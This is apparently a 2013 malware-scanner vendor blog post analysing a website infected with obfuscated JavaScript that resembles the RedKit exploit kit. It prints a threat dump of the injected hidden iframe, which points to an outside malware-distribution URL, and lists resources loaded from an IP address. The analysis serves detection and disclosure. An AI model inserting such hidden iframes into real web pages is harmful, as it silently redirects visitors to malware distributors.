Thursday, May 23, 2013

Website with RedKit exploit kit pattern redirects visitors to malware distributors

Website redirects browser

Background

Online Website Malware Scanner has identified malicious JavaScript code injection in the scanned website. Such malicious obfuscated JavaScript code is used to build malicious iframe invisible to the website user and which downloads content from remote malware distributor.

This infected website hosts suspicious JavaScript code injected in 33 files. As discussed in other posts about malicious iframes generation, the attack flow is very similar and contains multiple levels of obfuscation to overcome the detection mechanisms. This particular threat resembles RedKit exploit kit and it generates iframes to http://alicebangkokescorts.com/womd.html\?i=898055 which in turn loads malicious images into the web browser.

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources(websites).

Website malware scanner report

Submission date: Thu May 23 13:33:37 2013
Infected website's files: 33
Website malware scan report link: http://goo.gl/rAQAB

Quttera | website malware scanner
Quttera | Website Malware Scanner sitescan report


malicious iframe
Malicious iframe


Threat dump: [[<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://alicebangkokescorts.com/womd.html?i=898055>]]


Malware entry


Malware entry details.

List of malware loaded during visit of http://alicebangkokescorts.com/womd.html\?i=898055

<img src="http://74.53.143.237/images/gatorbottom.png" alt="" /> 



<embed src="http://74.53.143.237/images/hg728x90.swf?clickTAG=http://secure.hostgator.com/cgi-bin/affiliates/clickthru.cgi?id=page404" width="728" height="90"></embed>



 <div id="xxx"><img src="http://74.53.143.237/images/x.png" alt="" /></div>

Malicious payload


Decoded payload generates hidden iframe to http://alicebangkokescorts.com/womd.html\?i=898055


Blacklisting status


The website is Suspicious on Google Safe Browsing.



Google Safe Browsing analysis


Malware clean-up


Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.